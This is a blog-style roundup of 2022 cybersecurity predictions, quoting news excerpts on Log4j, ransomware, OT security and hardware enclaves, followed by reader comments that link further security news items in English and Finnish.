Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
Russia’s ‘Oculus’ to use AI to scan sites for banned information https://www.bleepingcomputer.com/news/security/russias-oculus-to-use-ai-to-scan-sites-for-banned-information/
Russia’s internet watchdog Roskomnadzor is developing a neural network that will use artificial intelligence to scan websites for prohibited information. Called “Oculus, ” the automatic scanner will analyze URLs, images, videos, and chats on websites, forums, social media, and even chat/messenger channels to locate material that should be redacted or taken down. Examples of information targeted by Oculus include homosexuality “propaganda, ” instructions on manufacturing weapons or drugs, and misinformation that discredits official state and army sources.
Tomi Engdahl says:
New tool checks if a mobile app’s browser is a privacy risk https://www.bleepingcomputer.com/news/security/new-tool-checks-if-a-mobile-apps-browser-is-a-privacy-risk/
A new online tool named ‘InAppBrowser’ lets you analyze the behavior of in-app browsers embedded within mobile apps and determine if they inject privacy-threatening JavaScript into websites you visit. The tool was created by developer Felix Krause who warned of this potentially risky behavior earlier in the month, explaining how easy it would be for in-app browsers to track anything the users see and do online by injecting JavaScript trackers on every web page they visit.
Tomi Engdahl says:
Vähän tunnettu hyökkäys vie rahat selvä merkki puhelimessa paljastaa vaaran https://www.is.fi/digitoday/tietoturva/art-2000009013238.html
ERILAISISTA verkkohuijauksista puhutaan paljon, mutta yksi rikollisuuden muoto on suurelle yleisölle verrattain vieras. Mitä jos joku vain kaappaisi puhelinliittymäsi omiin nimiinsä ja varastaisi tietosi ja rahasi?. Tietoturvayhtiö Check Point valottaa, mistä tällaisessa huijauksessa on kysymys. Sim swapping tarkoittaa hyökkäystä, jossa uhrin puhelinliittymä kaapataan toiselle sim-kortille vanha sim-kortti mitätöimällä. Hyökkäystä varten rikollisen tulee ensin onnistua varastamaan uhrin henkilökohtaisia tietoja, kuten henkilötunnus, puhelinnumero ja koko nimi. Se voi onnistua esimerkiksi tietoja kalastelemalla tai tietovuodon seurauksena. Tämän jälkeen konna voi ottaa yhteyttä uhrin mobiilioperaattoriin ja tekeytyä uhriksi hänen tietojensa avulla.
Rikollinen saattaa jopa astua operaattorin fyysiseen liikkeeseen hankkiakseen uuden sim-kortin uhrin tiedoilla. Rikollinen laittaa uuden sim-kortin puhelimeensa, jolloin hänellä on laaja pääsy uhrin tietoihin.
Tomi Engdahl says:
Hackers target hotel and travel companies with fake reservations https://www.bleepingcomputer.com/news/security/hackers-target-hotel-and-travel-companies-with-fake-reservations/
A hacker tracked as TA558 has upped their activity this year, running phishing campaigns that target multiple hotels and firms in the hospitality and travel space. The threat actor uses a set of 15 distinct malware families, usually remote access trojans (RATs), to gain access to the target systems, perform surveillance, steal key data, and eventually siphon money from customers. In 2022, TA558 switched from using macro-laced documents in its phishing emails and adopted RAR and ISO file attachments or embedded URLs in the messages.
The phishing emails that initiate the infection chain are written in English, Spanish, and Portuguese, targeting companies in North America, Western Europe, and Latin America. The email topics revolve around making a booking on the target organization, pretending to come from conference organizers, tourist office agents, and other sources that the recipients can’t easily dismiss. In most of the cases Proofpoint observed this year, the payload was AsyncRAT or Loda, while Revenge RAT, XtremeRAT, CaptureTela, and BluStealer were also deployed on a smaller scale.
Tomi Engdahl says:
Huijarit jymäyttävät ihmisiä samalla kikalla vuodesta toiseen loppua ei näy https://www.is.fi/digitoday/tietoturva/art-2000009007888.html
TEKSTIVIESTITSE lähetetyt huijausviestit aiheuttavat suomalaisille merkittäviä rahallisia menetyksiä. Viesteihin haksahtamista helpottaa se, että se vaikuttaa tulevan aidolta taholta. Huijarin tekstiviesti eli sms saapuneesta paketista näkyy usein samassa viestiketjussa Postin aitojen viestien kanssa. Pankkihuijari puolestaan tunkeutuu samaan ketjuun kuin S-Pankin lähettämät todelliset tekstiviestivahvistuksen koodit. Syy on siinä, että tekstiviestin lähettäjä on helppo väärentää. TELEOPERAATTORIEN mukaan ongelmaan on vaikea puuttua. Tekstiviesteissä käytetty tekniikka kun todellakin mahdollistaa viestin lähettäjän määrittelyn täysin vapaasti.
Tomi Engdahl says:
Researchers Find Counterfeit Phones with Backdoor to Hack WhatsApp Accounts https://thehackernews.com/2022/08/researchers-find-counterfeit-phones.html
Budget Android device models that are counterfeit versions associated with popular smartphone brands are harboring multiple trojans designed to target WhatsApp and WhatsApp Business messaging apps. The trojans, which Doctor Web first came across in July 2022, were discovered in the system partition of at least four different smartphones: P48pro, radmi note 8, Note30u, and Mate40
Tomi Engdahl says:
Many Media Industry Vendors Slow to Patch Critical Vulnerabilities: Study
https://www.securityweek.com/many-media-industry-vendors-slow-patch-critical-vulnerabilities-study
A cybersecurity analysis of hundreds of media industry vendors showed that many companies are slow to patch critical vulnerabilities, according to MDR and third-party risk management provider BlueVoyant.
The media industry faces various types of cybersecurity incidents, including content leaks on torrent sites and dark web forums, disruptions to the channels used to deliver content to consumers, and other disruptive attacks, such as ransomware and denial of service (DoS).
BlueVoyant has analyzed nearly 500 vendors. This includes 49 companies that supply content management, production, monetization and distribution services to most media companies, and 436 firms that represent suppliers whose products and services are widely used but not common across the entire industry.
Of all these companies, 143 had what the security firm calls ‘zero tolerance findings’, which are critical vulnerabilities in internet-facing systems that are commonly targeted by threat actors.
One or more such vulnerabilities were identified at roughly 30% of media vendors, which BlueVoyant says is nearly double compared to the multi-industry average it has observed across more than one million companies.
Tomi Engdahl says:
Lloyd’s of London Introduces New War Exclusion Insurance Clauses
https://www.securityweek.com/lloyds-london-introduces-new-war-exclusion-insurance-clauses
Lloyds of London, which describes itself as ‘the world’s leading insurance and reinsurance marketplace’, has clarified its position on war exclusions and cyberattack cover. It will require its underwriters to include such an exclusion based on its definition of cyberwar in future cyber insurance policies.
The argument is clear and simple: the rising cost of cyber insurance payouts. “In particular, the ability of hostile actors to easily disseminate an attack,” announces (PDF) Lloyd’s, “…means that losses have the potential to greatly exceed what the insurance market is able to absorb.”
The new exclusion will come into effect from March 2023 at the inception of new or renewal of existing cyber insurance policies. This is not a withdrawal from the cyber insurance market in general, but potentially a retraction from one of industry’s primary causes of concern: geopolitically motivated destructive cyberattacks.
Over the last few years, the insurance industry has struggled to keep pace with ransomware costs and has been forced to repeatedly increase both premiums and insurance exclusions. Now Lloyd’s is worried about the potential cost of cyberwar.
A basic war exclusion clause has always been part of insurance – but Lloyds is clarifying (and expanding) its definition of cyberwar. It is making clear that an act of cyberwar is not dependent on a physical declaration of war nor the existence of physical (kinetic) hostilities between two or more nations.
Nor, in fact, does a cyberattack need to be delivered by a recognized state or state actor for it to be classified as an act of cyberwar and therefore excluded from a cyber insurance policy. The result could be contentious.
Lloyd’s has provided four model clauses from which its underwriters should choose. In each case, an insurance payout is excluded if the attack is attributed to a foreign state. But as with all cyberattacks, attribution can be tricky.
Tomi Engdahl says:
One-Third of Popular PyPI Packages Mistakenly Flagged as Malicious https://www.darkreading.com/application-security/one-third-pypi-packages-mistakenly-flagged-malicious
The scans used by the Python Package Index (PyPI) to find malware fail to catch 41% of bad packages, while creating plentiful false positives.
The scanners tasked with weeding out malicious contributions to packages distributed via the popular open source code repository Python Package Index (PyPI) create a significant number of false alerts, researchers have found.
According to a Chainguard analysis of PyPI — the main repository for software components used in applications written in Python — the approach catches 59% of malicious packages but also flags a third of popular legitimate Python packages and 15% of a random selection of packages.
The research aims to create a data set that Python maintainers and the PyPI repository can use to determine the efficacy of their system for scanning projects for malicious changes and supply chain attacks, the Chainguard researchers stated in a Tuesday analysis.
Tomi Engdahl says:
Nykyisen malliset henkilötunnukset loppuvat parissa vuodessa it-järjestelmien toimivuus kannattaa varmistaa
https://www.tivi.fi/uutiset/tv/9237346b-458b-4c4e-9cbc-a9fb54fd5780
Virasto arvioi nykyisten henkilötunnusten riittävän vielä noin kahdeksi vuodeksi. Uudet välimerkit varmistavat henkilötunnusten riittävyyden jatkossa. Jo käytössä oleviin henkilötunnuksiin ei tule muutoksia. Tämänhetkisen arvion mukaisesti uuden välimerkkiasetuksen mukaisia uusia henkilötunnuksen välimerkkejä annetaan ensimmäisen kerran syyskuussa 2024. Arvio perustuu vuosien 20162021 keskimääräiseen antomäärään, ja Digi- ja väestötietovirasto päivittää arviota kuukausittain. Viraston mukaan myös henkilötunnuksia käsittelevien organisaatioiden on tärkeää valmistautua muutokseen ja varmistaa, että uudenlaiset henkilötunnukset toimivat niiden tietojärjestelmissä.
Tomi Engdahl says:
Security Pros Believe Cybersecurity Now Aligned With Cyberwar
https://www.securityweek.com/security-pros-believe-cybersecurity-now-aligned-cyberwar
More than three-quarters of security professionals in large organizations believe the world is now in a state of perpetual cyberwar – and 82% consider that geopolitics and cybersecurity are fundamentally linked.
The figures come from a survey conducted by Sapio for machine identity solutions provider Venafi. The survey hasn’t been published, but the results are discussed in a Venafi blog.
Sapio surveyed 1,101 security decision makers in firms with more than 1,000 employees (24% had more than 10,000 employees) across the US, UK, France, Germany, the Benelux countries, and Australia. Almost 50% of the individuals surveyed were at c-suite level or above.
Tomi Engdahl says:
Old, Inconspicuous Vulnerabilities Commonly Targeted in OT Scanning Activity
https://www.securityweek.com/old-inconspicuous-vulnerabilities-commonly-targeted-ot-scanning-activity
Data collected by IBM shows that old and inconspicuous vulnerabilities affecting industrial products are commonly targeted in scanning activity seen by organizations that use operational technology (OT). SecurityWeek has talked to several experts to find out what this data means and determine the threat posed by these security holes.
Last week, IBM Security’s X-Force research and intelligence unit published a report describing the OT threat landscape in the first half of 2022. The findings from the report are not surprising: manufacturing continues to be the most targeted industry, phishing remains the main initial infection vector, and spam, RATs and ransomware are the most commonly seen attack types.
IBM has also looked at vulnerability scanning activity and found that the top two methods, accounting for more than 80% of scanning, are port scanning and Shodan scanning.
Much of the scanning appeared to be indiscriminate and did not seem to be specifically aimed at organizations with OT environments. However, an analysis of the attack alerts from OT-related industries showed that the most commonly targeted vulnerability was CVE-2016-4510, a flaw in the WAP interface of the Trihedral VTScada SCADA software that allows remote attackers to bypass authentication and read arbitrary files.
Other vulnerabilities that attackers commonly scan for include CVE-2021-21801, CVE-2021-21802, and CVE-2021-21803, which are cross-site scripting (XSS) issues affecting Advantech’s R-SeeNet router monitoring software, as well as CVE-2018-12634, a credential disclosure flaw affecting Circontrol’s CirCarLife SCADA software for electric vehicle charging stations.
Tomi Engdahl says:
ECF22: Mikään laite ei ole täysin turvallinen
https://etn.fi/index.php/72-ecf/13915-ecf22-mikaeaen-laite-ei-ole-taeysin-turvallinen
Meillä useimmilla on kotona erilaisia vimpaimia, jotka on liitetty kodin wifi-verkkoon ja sen kautta julkiseen internetiin. Ja jos olemme kuten suurin osa ihmisistä, laitteiden tietoturva-asetuksiin ei ole koskettu. Nämä muodostavat potentiaalisesti suuren riskin. Näin ei kuitenkaan tarvitse olla.
Tämä on yksi syyskuun 6. päivänä järjestettävän Embedded Conference Finlandin teemoista. IoT-laitteet ovat olleet tietoturvastandardoinnin kannalta melkoinen viidakko. Nyt asiaan on tulossa korjausta. Prosessi on hidas, mutta Etteplanin myyntijohtaja Antti Tolvanen kertoo ECF22-avainpuheessaan, missä standardoinnissa mennään tällä hetkellä.
Standardointi tuo ajan myötä hyvän perustan laitteiden tietoturvalle, mutta tietenkään se ei riitä. Sen lisäksi tarvitaan räätälöityjä ratkaisuja sekä laite- että ohjelmistopuolelle, jotta laite on turvallinen eikä mahdollista sisääntuloa suojattuun verkkoon.
Tomi Engdahl says:
Why is EDR Important to the Security Stack? What are EDR Best Practices? You can learn about it in the newest article on our blog. Check it out!
#EDR #pentest #magazine #pentest #backdoor #undetectable #cybersecurity #infosecurity #infosec
Meaning of EDR and Its Importance to the Security Stack in 2022
https://pentestmag.com/meaning-of-edr-and-its-importance-to-the-security-stack-in-2022/
What is the Meaning of EDR?
The term Endpoint Detection and Response (EDR), coined by Anton Chuvakin of Gartner, refers to a security system that uses advanced analytics and automation to:
Detect suspicious activity on hosts and endpoints like employee workstations, servers, and mobile devices
Perform automated rule-based threat response directly on the endpoint
Enable security teams to quickly investigate and respond to threats
Today EDR is a mature solution provided by most security vendors, as an integrated agent deployed on endpoints. Modern EDR solutions can monitor endpoints, collect activity data that may indicate threats, and analyze this data to identify threat patterns.
Tomi Engdahl says:
Everything You Didn’t Know You Need To Know About Glitching Attacks
https://hackaday.com/2022/08/25/everything-you-didnt-know-you-need-to-know-about-glitching-attacks/
If you’ve always been intrigued by the idea of performing hardware attacks but never knew where to start, then we’ve got the article for you: an in-depth look at the hows and whys of hardware glitching.
Attentive readers will recall that we’ve featured [Matthew Alt]’s reverse engineering exploits before, like the time he got root on a Linux-based arcade cabinet. For something a bit more challenging, he chose a Trezor One crypto wallet this time. We briefly covered a high-stakes hack (third item) on one of these wallets by [Joe Grand] a while back, but [Matthew] offers much, much more detail.
Replicant: Reproducing a Fault Injection Attack on the Trezor One
https://voidstarsec.com/blog/replicant-part-1
Tomi Engdahl says:
https://www.uusiteknologia.fi/2022/08/26/valesivustot-entista-vaarallisempia/
Tomi Engdahl says:
XIoT Vendors Show Progress on Discovering, Fixing Firmware Vulnerabilities
https://www.securityweek.com/xiot-vendors-show-progress-discovering-fixing-firmware-vulnerabilities
Self-disclosures by XIoT vendors have surpassed independent research outfits as the second most prolific vulnerability reporters
A major impact of the pandemic has been the acceleration of digital transformation, which has expanded from advanced digitization into increasingly unmanaged automation. This automation is largely controlled by unmanaged cyber/physical devices. It started with the first generation of largely consumer oriented IoT devices but has grown into what some now call Industry 5.0.
The key aspect is no longer simply whether the device has internet connectivity, but whether it performs its functions automatically in an unmanaged fashion. This has become so much wider and more complex than the original concept of IoT or even IIoT. It now includes automatically functioning medical devices, building controls, smart city management, many aspects of OT and industrial control systems, and much more.
Tomi Engdahl says:
Leaked Docs Show Spyware Firm Offering iOS, Android Hacking Services for $8 Million
https://www.securityweek.com/leaked-docs-show-spyware-firm-offering-ios-android-hacking-services-8-million
Tomi Engdahl says:
Google Open Sources ‘Paranoid’ Crypto Testing Library
https://www.securityweek.com/google-open-sources-paranoid-crypto-testing-library
Google has officially announced the open sourcing of ‘Paranoid’, a project for identifying well-known weaknesses in cryptographic artifacts.
The library includes support for testing multiple crypto artifacts, such as digital signatures, general pseudorandom numbers, and public keys, to identify issues caused by programming errors, or the use of weak proprietary random number generators.
Paranoid, Google says, can check any artifact, even those generated by systems with unknown implementations – which the company calls ‘black boxes’ – where the source code cannot be inspected.
“An artifact may be generated by a black-box if, for example, it was not generated by one of our own tools (such as Tink), or by a library that we can inspect and test using Wycheproof. Unfortunately, sometimes we end up relying on black-box generated artifacts,” the internet giant notes.
Paranoid contains implementations and optimizations extracted from existing crypto-related literature, which “showed that the generation of these artifacts was flawed in some cases,” Google explains.
https://github.com/google/paranoid_crypto
https://security.googleblog.com/2022/08/announcing-open-sourcing-of-paranoids.html?m=1
Tomi Engdahl says:
How Economic Changes and Crypto’s Rise Are Fueling the use of “Cyber Mules”
https://www.securityweek.com/how-economic-changes-and-cryptos-rise-are-fueling-use-cyber-mules
The rise of cryptocurrency has ushered in a new era of money laundering
